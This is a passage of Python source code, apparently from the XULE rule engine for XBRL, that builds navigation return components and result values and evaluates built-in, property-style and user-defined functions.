    if side_value.type == 'concept':
        return {side_value.value, }
    if side_value.type in ('set', 'list'):
        concepts = set()
        for member in side_value.value:
            if member.type == 'qname':
                member_concept = XuleProperties.get_concept(dts, member.value)
                if member_concept is not None:
                    concepts.add(member_concept)
            elif member.type == 'concept':
                concepts.add(member.value)
            else:
                raise XuleProcessingError(_(
                    "In navigation, expecting a collection of concepts or concepts, but found {}.".format(
                        member.type)))
        return concepts
    raise XuleProcessingError(
        _("In navigation, expecting a concept or qname, but found {}.".format(side_value.type)))
def nav_decorate(rel, direction, return_names, include_start, paths, xule_context):
    """Produce the output rows for a single navigation item.

    Arguments:
        rel (dict or list of dicts): One rel_info dict, or — when paths are
            requested — the list of rel_info dicts making up a path.
        direction (str): 'up' or 'down'. Direction of the traversal.
        return_names (list): The return components to decorate the relationship with.
        include_start (bool): Whether an extra row for the start concept is emitted.
        paths (bool): Whether path results were requested.
        xule_context (XuleRuleContext): Processing context.

    Returns:
        A list of component rows (or, for paths, a single-element list holding
        the list of rows for the path).
    """
    decorated = list()
    if paths:
        # rel is the list of relationships making up one path.
        single_path = list()
        for step in rel:
            if include_start and step.get('first', False):
                single_path.append(nav_decorate_gather_components(step, direction, return_names, True, xule_context))
            single_path.append(nav_decorate_gather_components(step, direction, return_names, False, xule_context))
        decorated.append(single_path)
    elif rel['relationship'] is not None:
        if include_start and rel.get('first', False):
            decorated.append(nav_decorate_gather_components(rel, direction, return_names, True, xule_context))
        decorated.append(nav_decorate_gather_components(rel, direction, return_names, False, xule_context))
    return decorated
def get_return_component_names(nav_expr, xule_context):
    """Collect the list of return component names from a navigation expression.

    A component is either a literal name (kept as-is) or an AST expression
    (a dict) that must evaluate to a qname naming an arc attribute. When the
    expression has no return components, the default is ['target'].
    """
    return_clause = nav_expr.get('return', dict())
    if 'returnComponents' not in return_clause:
        return ['target']
    component_names = list()
    for component in return_clause['returnComponents']:
        if not isinstance(component, dict):
            component_names.append(component)
            continue
        # An expression: must evaluate to a qname (an arc attribute name).
        component_name_value = evaluate(component, xule_context)
        if component_name_value.type != 'qname':
            raise XuleProcessingError(_(
                "Expression in return components of a navigate expression did not evaluate to a qname. Expecting a qname for the name of a arc attribute. Found {}").format(
                component_name_value.type), xule_context)
        component_names.append(component_name_value.value)
    return component_names
# nav_expr.get('return', {'returnComponents': ('target',)}).get('returnComponents', ('target',))
def nav_decorate_gather_components(rel, direction, component_names, is_start, xule_context):
    """Produce the list of return-component values for one relationship.

    Arguments:
        rel (dict): Relationship info dict from the traversal.
        direction (str): 'up' or 'down'.
        component_names (list): Return component names to gather.
        is_start (bool): Treat this row as the extra 'include start' row.
        xule_context (XuleRuleContext): The processing context.

    Returns:
        A list of (value, xule-type, component-name) tuples. 'result-order'
        stays a placeholder string and is filled in during the finishing step,
        once the overall result order is known.
    """
    return ['result-order' if component_name == 'result-order'
            else nav_decorate_component_value(rel, direction, component_name, is_start, xule_context)
            for component_name in component_names]
def nav_decorate_component_value(rel, direction, component_name, is_start, xule_context):
    """Get the return component value for a relationship and a single return component.

    Dispatches through the NAVIGATE_RETURN_COMPONENTS registry; components
    flagged as allowed-on-start receive the extra is_start argument. A QName
    component names an arc attribute captured during traversal.

    Arguments:
        rel (dict): A dictionary of the relationship and additional information from the traversal
        direction (string): 'up' or 'down'. Direction of the traversal
        component_name (string or QName): Component name
        is_start (boolean): Indicates if the relationship should be treated as a starting relationship. This is used if the 'include start' keyword
                            is included in the navigation expression and the relationship is from the start of the navigation. In this case there is
                            an extra result for the relationships for the starting concept.
        xule_context (XuleRuleContext): The processing context.
    Returns:
        A tuple of:
            1. component value
            2. xule type for the value
            3. component name (used for ease of debugging)
    """
    if component_name in NAVIGATE_RETURN_COMPONENTS:
        # Relationships filtered out during traversal are marked None and yield a 'none' value.
        if rel['relationship'] is None:
            return (None, 'none', component_name)
        # NOTE(review): the rel['relationship'] is None checks below are unreachable
        # because of the early return above; kept as-is.
        if NAVIGATE_RETURN_COMPONENTS[component_name][NAVIGATE_ALLOWED_ON_START]:
            if rel['relationship'] is None:
                return (None, 'none', component_name)
            else:
                # Components allowed on the start concept take the extra is_start argument.
                return NAVIGATE_RETURN_COMPONENTS[component_name][NAVIGATE_RETURN_FUCTION](rel, direction,
                                                                                           component_name, is_start,
                                                                                           xule_context)
        else:
            if is_start:
                # Component not defined for the start row.
                return (None, 'none', component_name)
            else:
                if rel['relationship'] is None:
                    return (None, 'none', component_name)
                else:
                    return NAVIGATE_RETURN_COMPONENTS[component_name][NAVIGATE_RETURN_FUCTION](rel, direction,
                                                                                               component_name,
                                                                                               xule_context)
    else:
        # Could be an arc attribute name (qname)
        if isinstance(component_name, QName):
            if rel['relationship'] is None:
                return (None, 'none', component_name)
            else:
                attribute_value = rel[component_name]
                if attribute_value is None:
                    return (None, 'none', component_name)
                else:
                    return (attribute_value, 'string', component_name)
        else:
            raise XuleProcessingError(_("Component {} is not currently supported.".format(component_name)),
                                      xule_context)
def nav_decorate_component_target(rel, direction, component_name, is_start, xule_context):
    """Return the target concept (or its qname) of a traversal step.

    For the extra 'include start' row the opposite side of the relationship is
    reported, so the start concept itself appears as the target.
    """
    relationship = rel['relationship']
    # Start rows flip sides; an 'up' traversal flips again.
    use_to_side = is_start == (direction == 'up')
    concept = relationship.toModelObject if use_to_side else relationship.fromModelObject
    if component_name == 'target':
        return (concept, 'concept', component_name)
    if component_name == 'target-name':
        return (concept.qname, 'qname', component_name)
def nav_decorate_component_source(rel, direction, component_name, xule_context):
    """Return the source concept (or its qname) of a traversal step.

    For an 'up' traversal the 'to' side of the relationship is the source.
    """
    relationship = rel['relationship']
    concept = relationship.toModelObject if direction == 'up' else relationship.fromModelObject
    if component_name == 'source':
        return (concept, 'concept', component_name)
    if component_name == 'source-name':
        return (concept.qname, 'qname', component_name)
def nav_decorate_component_order(rel, direction, component_name, xule_context):
    """Return the relationship's order attribute as a 'decimal' component."""
    order_value = rel['relationship'].orderDecimal
    return (order_value, 'decimal', component_name)
def nav_decorate_component_weight(rel, direction, component_name, xule_context):
    """Return the calculation weight as a 'decimal' component, or 'none' when absent."""
    weight = rel['relationship'].weightDecimal
    return (None, 'none', component_name) if weight is None else (weight, 'decimal', component_name)
def nav_decorate_component_preferred_label_role(rel, direction, component_name, xule_context):
    """Return the preferred label role of the relationship as a 'role' component, or 'none' when absent."""
    preferred = rel['relationship'].preferredLabel
    if preferred is None:
        return (None, 'none', component_name)
    # Convert the role URI to a model role type object.
    return (XuleUtility.role_uri_to_model_role(rel['relationship'].modelXbrl, preferred), 'role', component_name)
def nav_decorate_component_preferred_label(rel, direction, component_name, xule_context):
    """Return the preferred label of the target concept as a 'label' component, or 'none' when unavailable."""
    preferred = rel['relationship'].preferredLabel
    if preferred is None:
        return (None, 'none', component_name)
    label = XuleProperties.get_label(xule_context, rel['relationship'].toModelObject, preferred, None)
    return (None, 'none', component_name) if label is None else (label, 'label', component_name)
def nav_decorate_component_relationship(rel, direction, component_name, xule_context):
    """Return the relationship object itself as the component value."""
    relationship_value = rel['relationship']
    return (relationship_value, 'relationship', component_name)
def nav_decorate_component_role(rel, direction, component_name, xule_context):
    """Return the relationship's extended link role as a 'role' component."""
    return (get_role(rel['relationship'], xule_context), 'role', component_name)
def get_role(relationship, xule_context):
    """Resolve the relationship's link role URI to a role type from the model.

    Falls back to wrapping the bare URI in a XuleRole when the model does not
    declare the role.
    """
    role_uri = relationship.linkrole
    role_types = xule_context.model.roleTypes
    if role_uri in role_types:
        return role_types[role_uri][0]
    return XuleRole(role_uri)
def nav_decorate_component_role_uri(rel, direction, component_name, xule_context):
    """Return the relationship's extended link role URI as a 'uri' component."""
    return (rel['relationship'].linkrole, 'uri', component_name)
def nav_decorate_component_role_description(rel, direction, component_name, xule_context):
    """Return the role's definition text as a 'string' component."""
    return (get_role(rel['relationship'], xule_context).definition, 'string', component_name)
def nav_decorate_component_arcrole(rel, direction, component_name, xule_context):
    """Return the relationship's arcrole as a 'role' component."""
    return (get_arcrole(rel['relationship'], xule_context), 'role', component_name)
def get_arcrole(relationship, xule_context):
    """Resolve the relationship's arcrole URI to an arcrole type from the model.

    Falls back to wrapping the bare URI in a XuleArcrole when the model does
    not declare the arcrole.
    """
    arcrole_uri = relationship.arcrole
    arcrole_types = xule_context.model.arcroleTypes
    if arcrole_uri in arcrole_types:
        return arcrole_types[arcrole_uri][0]
    return XuleArcrole(arcrole_uri)
def nav_decorate_component_arcrole_uri(rel, direction, component_name, xule_context):
    """Return the relationship's arcrole URI as a 'uri' component."""
    arcrole_uri = rel['relationship'].arcrole
    return (arcrole_uri, 'uri', component_name)
def nav_decorate_component_arcrole_description(rel, direction, component_name, xule_context):
    """Return the arcrole's definition text as a 'string' component."""
    return (get_arcrole(rel['relationship'], xule_context).definition, 'string', component_name)
def nav_decorate_component_cycles_allowed(rel, direction, component_name, xule_context):
    """Return the arcrole's cyclesAllowed value as a 'string' component."""
    return (get_arcrole(rel['relationship'], xule_context).cyclesAllowed, 'string', component_name)
def nav_decorate_component_link_name(rel, direction, component_name, xule_context):
    """Return the qname of the extended link element as a 'qname' component."""
    link_qname = rel['relationship'].linkQname
    return (link_qname, 'qname', component_name)
def nav_decorate_component_arc_name(rel, direction, component_name, xule_context):
    """Return the qname of the arc element as a 'qname' component."""
    arc_qname = rel['relationship'].qname
    return (arc_qname, 'qname', component_name)
def nav_decorate_component_network(rel, direction, component_name, xule_context):
    """Return the network info captured during traversal as a 'network' component."""
    network_value = rel['network']
    return (network_value, 'network', component_name)
def get_network_info(network, xule_context):
    """Pair a hashable identifier tuple for a network with the network object itself."""
    return ((network.arcrole, network.linkrole, network.arcqname, network.linkqname, False), network)
def nav_decorate_component_cycle(rel, direction, component_name, is_start, xule_context):
    """Return whether this traversal step closed a cycle; the start row is never a cycle."""
    if is_start:
        return (False, 'bool', component_name)
    return (rel.get('cycle', False), 'bool', component_name)
def nav_decorate_component_navigation_order(rel, direction, component_name, is_start, xule_context):
    """Return the sibling order within the traversal; the start row is 0."""
    return (0 if is_start else rel['navigation-order'], 'int', component_name)
def nav_decorate_component_navigation_depth(rel, direction, component_name, is_start, xule_context):
    """Return the depth of the traversal step; the start row is 0."""
    return (0 if is_start else rel['navigation-depth'], 'int', component_name)
def nav_decorate_component_result_order(rel, direction, component_name, is_start, xule_context):
    """Return the result order of the traversal step; the start row is 0."""
    return (0 if is_start else rel['result-order'], 'int', component_name)
def nav_decorate_component_drs_role(rel, direction, component_name, is_start, xule_context):
    """Return the DRS role for dimensional relationships; 'none' for regular relationships."""
    relationship = rel['relationship']
    if not isinstance(relationship, DimensionRelationship):
        return (None, 'none', component_name)
    return (relationship.dimension_set.drs_role, 'role', component_name)
def nav_decorate_component_dimension_type(rel, direction, component_name, is_start, xule_context):
    """Return the dimension type of the relevant concept for dimensional relationships; 'none' otherwise."""
    relationship = rel['relationship']
    if not isinstance(relationship, DimensionRelationship):
        return (None, 'none', component_name)
    # The start row (going down) and any non-start row (going up) report the 'from' side.
    if (is_start and direction == 'down') or (not is_start and direction == 'up'):
        dim_type = relationship.fromDimensionType
    else:
        dim_type = relationship.toDimensionType
    return (None, 'none', component_name) if dim_type is None else (dim_type, 'string', component_name)
def nav_decorate_component_dimension_sub_type(rel, direction, component_name, is_start, xule_context):
    """Return the dimension sub-type of the relevant concept for dimensional relationships; 'none' otherwise."""
    relationship = rel['relationship']
    if not isinstance(relationship, DimensionRelationship):
        return (None, 'none', component_name)
    # The start row (going down) and any non-start row (going up) report the 'from' side.
    if (is_start and direction == 'down') or (not is_start and direction == 'up'):
        dim_type = relationship.fromDimensionSubType
    else:
        dim_type = relationship.toDimensionSubType
    return (None, 'none', component_name) if dim_type is None else (dim_type, 'string', component_name)
def nav_decorate_component_usable(rel, direction, component_name, is_start, xule_context):
    """Return whether the relevant side's concept is usable in the dimension set.

    Only meaningful for dimensional relationships; returns a 'none' value for
    regular relationships or when usability is undetermined.
    """
    relationship = rel['relationship']
    if not isinstance(relationship, DimensionRelationship):
        return (None, 'none', component_name)
    # The start row (going down) and any non-start row (going up) report the 'from' side.
    if (is_start and direction == 'down') or (not is_start and direction == 'up'):
        concept = relationship.fromModelObject
    else:
        concept = relationship.toModelObject
    # Query usability once instead of twice (the original called isUsable in both the test and the return).
    usable = relationship.dimension_set.isUsable(concept)
    if usable is None:
        return (None, 'none', component_name)
    return (usable, 'bool', component_name)
# Navigation return component tuple locations
NAVIGATE_RETURN_FUCTION = 0  # index of the component-value function in the registry tuples below
NAVIGATE_ALLOWED_ON_START = 1  # index of the flag: component may be produced for the 'include start' row
# Registry mapping each return component name to (value function, allowed-on-start flag).
# Functions whose flag is True take an extra is_start argument (dispatched in nav_decorate_component_value).
NAVIGATE_RETURN_COMPONENTS = {'source': (nav_decorate_component_source, False),
                              'source-name': (nav_decorate_component_source, False),
                              'target': (nav_decorate_component_target, True),
                              'target-name': (nav_decorate_component_target, True),
                              'order': (nav_decorate_component_order, False),
                              'weight': (nav_decorate_component_weight, False),
                              'preferred-label-role': (nav_decorate_component_preferred_label_role, False),
                              'preferred-label': (nav_decorate_component_preferred_label, False),
                              'relationship': (nav_decorate_component_relationship, False),
                              'role': (nav_decorate_component_role, False),
                              'role-uri': (nav_decorate_component_role_uri, False),
                              'role-description': (nav_decorate_component_role_description, False),
                              'arcrole': (nav_decorate_component_arcrole, False),
                              'arcrole-uri': (nav_decorate_component_arcrole_uri, False),
                              'arcrole-description': (nav_decorate_component_arcrole_description, False),
                              'arcrole-cycles-allowed': (nav_decorate_component_cycles_allowed, False),
                              'link-name': (nav_decorate_component_link_name, False),
                              'arc-name': (nav_decorate_component_arc_name, False),
                              'network': (nav_decorate_component_network, False),
                              'cycle': (nav_decorate_component_cycle, True),
                              'navigation-order': (nav_decorate_component_navigation_order, True),
                              'navigation-depth': (nav_decorate_component_navigation_depth, True),
                              'result-order': (nav_decorate_component_result_order, True),
                              'drs-role': (nav_decorate_component_drs_role, True),
                              'dimension-type': (nav_decorate_component_dimension_type, True),
                              'dimension-sub-type': (nav_decorate_component_dimension_sub_type, True),
                              'usable': (nav_decorate_component_usable, True),
                              }
def nav_finish_results(nav_expr, return_items, add_result_order, xule_context):
    """Format the results of navigation into their final XuleValue form.

    When the navigation expression requests results grouped by network
    ('byNetwork'), a dictionary keyed by network is produced, where each value
    is the finished result for that network's return items. Otherwise the
    return items are finished directly.

    Arguments:
        nav_expr (dictionary): The navigation expression AST node.
        return_items: The decorated return items (a dict keyed by network when
            'byNetwork' is requested, otherwise a flat list).
        add_result_order (bool): Whether the result order should be added to
            the results.
        xule_context (XuleRuleContext): The processing context.

    Returns a XuleValue which is the final result of the navigation.
    """
    return_options = nav_expr.get('return', dict())
    if not return_options.get('byNetwork', False):
        # No network grouping requested - finish the flat list of items.
        return nav_finish_return_items(nav_expr, return_items, add_result_order, xule_context)

    # Group the finished results by network.
    network_results = dict()
    network_shadows = dict()
    for network, items_for_network in return_items.items():
        finished = nav_finish_return_items(nav_expr, items_for_network, add_result_order, xule_context)
        network_results[XuleValue(xule_context, network, 'network')] = finished
        network_shadows[network] = finished.shadow_collection
    return XuleValue(xule_context, frozenset(network_results.items()), 'dictionary',
                     shadow_collection=frozenset(network_shadows.items()))
def nav_finish_return_items(nav_expr, return_items, add_result_order, xule_context):
    """Convert decorated navigation return items into the final XuleValue.

    The result shape is controlled by the navigation expression's 'return'
    options:
      * paths - if True, each return item is a list of path items and the
        result is a nested list (one inner list per traversal path).
      * returnType - 'list' (default) or 'set'; a set deduplicates items by
        their shadow (plain Python) value.
      * returnComponentType - 'list' (default) or 'dictionary'; determines
        whether multi-component items become lists or dictionaries keyed by
        component name.

    Arguments:
        nav_expr (dictionary): The navigation expression AST node.
        return_items (list): The list of decorated return items.
        add_result_order (bool): If True, 'result-order' placeholders are
            replaced with a running 1-based order number.
        xule_context (XuleRuleContext): The processing context.

    Returns a XuleValue ('list' or 'set') of the finished items.
    """
    paths = nav_expr.get('return', dict()).get('paths', False)
    if 'return' in nav_expr:
        return_type = nav_expr['return'].get('returnType', 'list')
    else:
        return_type = 'list'
    # The return_component_type determines if the return components are a list or a dictionary keyed by the component name.
    return_component_type = nav_expr.get('return', dict()).get('returnComponentType', 'list')
    cur_order = 1
    final_results = list()
    final_shadow = list()
    def handle_return_item(return_item, cur_order):
        # Convert one decorated return item into a (XuleValue, shadow value,
        # next order number) triple. cur_order is threaded through explicitly
        # because the closure cannot rebind the outer variable.
        if add_result_order:
            # replace the 'result-order' placeholder with the actual order number
            return_item = [x if x != 'result-order' else (cur_order, 'int', 'result-order') for x in return_item]
            # return_item.append((cur_order, 'int', 'result-order'))
            cur_order += 1
        if return_component_type == 'list':
            if len(return_item) == 1:
                # A list of single items is returned.
                # The return item only has one return component
                return XuleValue(xule_context, return_item[0][0], return_item[0][1]), return_item[0][0], cur_order
                #
                # if return_type == 'list' or (return_type == 'set' and return_item[0][0] not in results_shadow):
                #     if return_component_type == 'list':
                #         results.append(XuleValue(xule_context, return_item[0][0], return_item[0][1]))
                #         results_shadow.append(return_item[0][0])
            else:
                # A list of list of components is returned.
                # The return_item has multiple return components
                multi_result = list()
                multi_shadow = list()
                for return_component in return_item:
                    multi_result.append(XuleValue(xule_context, return_component[0], return_component[1]))
                    multi_shadow.append(return_component[0])
                multi_shadow_tuple = tuple(multi_shadow)
                return XuleValue(xule_context, tuple(multi_result), 'list',
                                 shadow_collection=tuple(multi_shadow)), tuple(multi_shadow_tuple), cur_order
                # if return_type == 'list' or (return_type == 'set' and multi_shadow_tuple not in results_shadow):
                #     results.append(XuleValue(xule_context, tuple(multi_result), 'list', shadow_collection=tuple(multi_shadow)))
                #     results_shadow.append(multi_shadow_tuple)
        else:  # the return_component_type is a dictionary
            # Build a dictionary keyed by component name (component index 2).
            multi_result = dict()
            multi_shadow = dict()
            for return_component in return_item:
                multi_result[XuleValue(xule_context, return_component[2], 'string')] = XuleValue(xule_context,
                                                                                                 return_component[0],
                                                                                                 return_component[1])
                multi_shadow[return_component[2]] = return_component[0]
            return XuleValue(xule_context, frozenset(multi_result.items()), 'dictionary'), frozenset(
                multi_shadow.items()), cur_order
            #
            # if return_type == 'list' or (return_type == 'set' and frozenset(multi_shadow.items()) not in results_shadow):
            #     results.append(XuleValue(xule_context, frozenset(multi_result.items()), 'dictionary'))
            #     results_shadow.append(frozenset(multi_shadow.items()))
            #
            # return results, results_shadow
    for return_item in return_items:
        if paths:
            path_result = list()
            path_shadow = list()
            # The return item is a list of the items that make up a path. Process each item in the path.
            for path_item in return_item:
                path_item_result, path_item_shadow, cur_order = handle_return_item(path_item, cur_order)
                path_result.append(path_item_result)
                path_shadow.append(path_item_shadow)
            # Now the path is complete
            item_result = XuleValue(xule_context, tuple(path_result), 'list', shadow_collection=tuple(path_shadow))
            item_shadow = tuple(path_shadow)
        else:
            item_result, item_shadow, cur_order = handle_return_item(return_item, cur_order)
        if return_type == 'list':
            final_results.append(item_result)
            final_shadow.append(item_shadow)
        else:  # Set
            # Deduplicate by shadow value when a set is requested.
            if item_shadow not in final_shadow:
                final_results.append(item_result)
                final_shadow.append(item_shadow)
    if return_type == 'list':
        return XuleValue(xule_context, tuple(final_results), 'list', shadow_collection=tuple(final_shadow))
    else:
        return XuleValue(xule_context, frozenset(final_results), 'set', shadow_collection=frozenset(final_shadow))
def evaluate_function_ref(function_ref, xule_context):
    """Dispatch a function reference to the appropriate evaluator.

    Built-in functions are dispatched by their registered type ('aggregate'
    or 'regular'), property names are evaluated as function-style properties,
    and anything else is treated as a xule defined (user) function.
    """
    func_name = function_ref['functionName']
    if func_name in BUILTIN_FUNCTIONS:
        function_info = BUILTIN_FUNCTIONS.get(func_name)
        func_type = function_info[FUNCTION_TYPE]
        if func_type == 'aggregate':
            return evaluate_aggregate_function(function_ref, function_info, xule_context)
        if func_type == 'regular':
            return regular_function(xule_context, function_ref, function_info)
        raise XuleProcessingError(_("Unknown function type '{}'.".format(func_type)), xule_context)
    if func_name in XuleProperties.PROPERTIES:
        return property_as_function(xule_context, function_ref)
    # Not built in and not a property - must be a xule defined function.
    return user_defined_function(xule_context, function_ref)
def property_as_function(xule_context, function_ref):
    """Evaluate a function that is a property.

    Some functions are just a function version of a property. In these cases, the first argument is the object of the property and the rest of the args are
    arguments to the property.

    Example:
        -10.abs is the same as abs(-10)

    Arguments:
        xule_context (XuleRuleContext): The processing context.
        function_ref (dict): The function reference AST node.

    Returns the XuleValue produced by the property function.

    Raises XuleProcessingError if there are no arguments, the first argument
    has a type the property cannot operate on, or the argument count does not
    match the property definition.
    """
    # Get the property information
    property_info = XuleProperties.PROPERTIES[function_ref['functionName']]
    # Check that there is at least one argument. This is the property object
    if len(function_ref['functionArgs']) == 0:
        raise XuleProcessingError(
            _("The '{}' function must have at least one argument, found none.".format(function_ref['functionName'])),
            xule_context)
    # Check that the first argument is the right type
    property_object = evaluate(function_ref['functionArgs'][0], xule_context)
    if len(property_info[XuleProperties.PROP_OPERAND_TYPES]) > 0:
        # The object is acceptable if its type matches directly, it is a fact and
        # 'fact' is allowed, or it can be cast to one of the allowed types.
        if not (property_object.type in property_info[XuleProperties.PROP_OPERAND_TYPES] or
                property_object.is_fact and 'fact' in property_info[XuleProperties.PROP_OPERAND_TYPES] or
                any([xule_castable(property_object, allowable_type, xule_context) for allowable_type in
                     property_info[XuleProperties.PROP_OPERAND_TYPES]])):
            raise XuleProcessingError(
                _("The first argument of function '{}' must be {}, found '{}'.".format(function_ref['functionName'],
                                                                                       ', '.join(property_info[
                                                                                           XuleProperties.PROP_OPERAND_TYPES]),
                                                                                       property_object.type)),
                xule_context)
    # The remaining arguments are the property's arguments. This is bound
    # unconditionally (previously it was only bound inside the arg-count check,
    # which raised a NameError for properties with PROP_ARG_NUM of None).
    property_args = function_ref['functionArgs'][1:]
    if property_info[XuleProperties.PROP_ARG_NUM] is not None:
        # A non-negative PROP_ARG_NUM is an exact count; a negative value means
        # "no more than abs(count)" arguments.
        if property_info[XuleProperties.PROP_ARG_NUM] >= 0 and len(property_args) != property_info[
                XuleProperties.PROP_ARG_NUM]:
            raise XuleProcessingError(
                _("Property '%s' must have %s arguments. Found %i." % (function_ref['functionName'],
                                                                       property_info[XuleProperties.PROP_ARG_NUM],
                                                                       len(property_args))),
                xule_context)
        elif len(property_args) > property_info[XuleProperties.PROP_ARG_NUM] * -1 and property_info[
                XuleProperties.PROP_ARG_NUM] < 0:
            raise XuleProcessingError(
                _("Property '%s' must have no more than %s arguments. Found %i." % (function_ref['functionName'],
                                                                                    property_info[
                                                                                        XuleProperties.PROP_ARG_NUM] * -1,
                                                                                    len(property_args))),
                xule_context)
    # prepare the arguments
    arg_values = []
    for arg_expr in property_args:
        arg_value = evaluate(arg_expr, xule_context)
        arg_values.append(arg_value)
    # A property_info longer than 4 entries carries extra property data that is
    # passed through to the property function.
    if len(property_info) > 4:
        return property_info[XuleProperties.PROP_FUNCTION](xule_context, property_object,
                                                           property_info[XuleProperties.PROP_DATA], *arg_values)
    else:
        return property_info[XuleProperties.PROP_FUNCTION](xule_context, property_object, *arg_values)
def regular_function(xule_context, function_ref, function_info):
    """Evaluate a built-in (non aggregate) function.

    Validates the number of passed arguments against the function definition,
    evaluates each argument, and calls the function's evaluator with the
    evaluated values.
    """
    expected_arg_count = function_info[FUNCTION_ARG_NUM]
    passed_args = function_ref['functionArgs']
    if expected_arg_count is not None:
        # if the number of argument is none, then the function can have any number of arguments
        if expected_arg_count >= 0:
            # An exact argument count is required.
            if function_info[FUNCTION_TYPE] == 'regular' and len(passed_args) != expected_arg_count:
                raise XuleProcessingError(
                    _("The '%s' function must have only %i argument, found %i." % (function_ref['functionName'],
                                                                                   function_info[FUNCTION_ARG_NUM],
                                                                                   len(function_ref['functionArgs']))),
                    xule_context)
        else:
            # The function can have no more than the specified number of arguments.
            if function_info[FUNCTION_TYPE] == 'regular' and len(passed_args) > (expected_arg_count * -1):
                raise XuleProcessingError(
                    _("The '%s' function must have no more than %i arguments, found %i." % (function_ref['functionName'],
                                                                                            function_info[
                                                                                                FUNCTION_ARG_NUM] * -1,
                                                                                            len(function_ref[
                                                                                                'functionArgs']))),
                    xule_context)
    evaluated_args = []
    for arg_expr in passed_args:
        if function_info[FUNCTION_ALLOW_UNBOUND_ARGS]:
            # Unbound arguments are allowed - capture the stop value instead of
            # letting the iteration stop propagate.
            try:
                evaluated = evaluate(arg_expr, xule_context)
            except XuleIterationStop as xis:
                evaluated = xis.stop_value
        else:
            evaluated = evaluate(arg_expr, xule_context)
        evaluated_args.append(evaluated)
    return function_info[FUNCTION_EVALUATOR](xule_context, *evaluated_args)
def user_defined_function(xule_context, function_ref):
    """Evaluate a xule defined (user) function reference.

    Matches the call's arguments to the function declaration, binds each
    argument as a single-valued variable, evaluates the function body on an
    isolated iteration table, and unbinds the arguments afterwards. Results
    of argument-less function calls are cached on the global context.

    Arguments:
        xule_context (XuleRuleContext): The processing context.
        function_ref (dict): The function reference AST node.

    Returns either the full XuleValueSet (when the reference is iterable) or
    a single XuleValue.
    """
    # check function cache - The function cache is very basic. It only caches on functions that have no args.
    if len(function_ref['functionArgs']) == 0 and function_ref[
            'functionName'] in xule_context.global_context.function_cache:
        return xule_context.global_context.function_cache[function_ref['functionName']]
    function_info = xule_context.find_function(function_ref['functionName'])
    if function_info is None:
        raise XuleProcessingError("Function '%s' not found" % function_ref['functionName'], xule_context)
    else:
        # # Get the list of variables and their values. This will put the current single value for the variable as an argument
        # for var_ref in sorted(function_ref['var_refs'], key=lambda x: x[1]):
        #     '''NOT SURE THIS IS NEEDED. THE ARGUMENTS WILL BE EXVALUTED WHEN THE for arg in matched_args IS PROCESSED'''
        #     # 0 = var declaration id, 1 = var name, 2 = var_ref, 3 = var type (1 = var/arg, 2 = constant)
        #     var_value = evaluate(var_ref[2], xule_context)
        matched_args = match_function_arguments(function_ref, function_info['function_declaration'], xule_context)
        for arg in matched_args:
            # Evaluate each argument as a single value; an iteration stop
            # supplies its stop value instead of aborting the call.
            try:
                arg_value = evaluate(arg['expr'], xule_context)
            except XuleIterationStop as xis:
                arg_value = xis.stop_value
            xule_context.add_arg(arg['name'],
                                 arg['node_id'],
                                 arg['tagged'],
                                 arg_value,
                                 'single')
        # add the node_id of the function reference to the prefix used for calculating the processing node id
        # This is done before adding the args so the id prefix is set with the function declaration id before the args are added as variables.
        xule_context.id_prefix.append(function_ref['node_id'])
        body_expr = function_info['function_declaration']['body']
        save_aligned_result_only = xule_context.aligned_result_only
        def cleanup_function():
            # Undo the call-scoped state set up above (runs after evaluation,
            # even on error - see isolated_evaluation's finally block).
            # remove the args
            for arg in matched_args:
                xule_context.del_arg(arg['name'],
                                     arg['node_id'])
            # pop the function reference node id off the prefix
            xule_context.id_prefix.pop()
            # reset the aligned only results.
            xule_context.aligned_result_only = save_aligned_result_only
            # xule_context.used_expressions = save_used_expressions
        function_result_values = isolated_evaluation(xule_context,
                                                     function_info['function_declaration']['node_id'],
                                                     body_expr,
                                                     cleanup_function=cleanup_function  # ,
                                                     # iteration_reset_function=iteration_reset,
                                                     )
        if 'is_iterable' in function_ref:
            # Iterable reference - hand back the whole value set.
            function_results = function_result_values
        else:
            # Single-valued reference - take the first none-aligned value, or
            # unbound if there is none.
            if None in function_result_values.values:
                function_results = function_result_values.values[None][0]
            else:
                function_results = XuleValue(xule_context, None, 'unbound')
        # Cache function results that don't have any arguments.
        if len(function_ref['functionArgs']) == 0:
            xule_context.global_context.function_cache[function_ref['functionName']] = function_results
        # if function_ref.get('cacheable') == True:
        #     xule_context.global_context.function_cache[cache_key] = function_results
        #
        return function_results
def isolated_evaluation(xule_context, node_id, expr, setup_function=None, cleanup_function=None,
                        iteration_reset_function=None):
    """Evaluate an expression on its own (aggregation) iteration table.

    A new aggregation table is added to the context, the expression is
    evaluated once per iteration of that table, and every produced value is
    collected into a XuleValueSet. The context's aligned_result_only and
    used_expressions flags are saved before and restored after evaluation.

    Arguments:
        xule_context (XuleRuleContext): The processing context.
        node_id (int): Node id used to create and identify the isolated table.
        expr (dict): The AST expression to evaluate.
        setup_function: Optional callable run once after the table is created.
        cleanup_function: Optional callable run once after the table is removed
            (runs even if evaluation raises).
        iteration_reset_function: Optional callable run after each iteration.

    Returns a XuleValueSet of the values produced by the iterations.
    """
    save_aligned_result_only = xule_context.aligned_result_only
    save_used_expressions = xule_context.used_expressions
    # pre_aggregation_table_list_size = len(xule_context.iteration_table)
    isolated_table = xule_context.iteration_table.add_table(node_id, xule_context.get_processing_id(node_id),
                                                            is_aggregation=True)
    try:
        if setup_function is not None:
            setup_function()
        return_values = XuleValueSet()
        while True:
            # Reset per-iteration state before evaluating.
            xule_context.aligned_result_only = False
            xule_context.used_expressions = set()
            try:
                return_value = evaluate(expr,
                                        xule_context)  # , glob_cache_key=body_expr['node_id'] if len(matched_args)==0 else None)
            except XuleIterationStop as xis:
                return_value = xis.stop_value  # XuleValue(xule_context, None, 'unbound')
            # Capture the per-iteration context state on the produced value.
            return_value.facts = xule_context.facts.copy()
            return_value.tags = xule_context.tags.copy()
            return_value.aligned_result_only = xule_context.aligned_result_only
            return_value.used_expressions = xule_context.used_expressions
            return_value.alignment = xule_context.iteration_table.current_table.current_alignment
            # return_value.alignment = isolated_table.current_alignment
            return_values.append(return_value)
            # xule_context.iteration_table.del_current()
            xule_context.iteration_table.next(isolated_table.table_id)
            if iteration_reset_function is not None:
                iteration_reset_function()
            # if len(xule_context.iteration_table) == pre_aggregation_table_list_size:
            if isolated_table.is_empty:
                break
    finally:
        # ensure that the isolated table is removed if there is an exception.
        xule_context.iteration_table.del_table(isolated_table.table_id)
        # reset the aligned only results.
        xule_context.aligned_result_only = save_aligned_result_only
        xule_context.used_expressions = save_used_expressions
        if cleanup_function is not None:
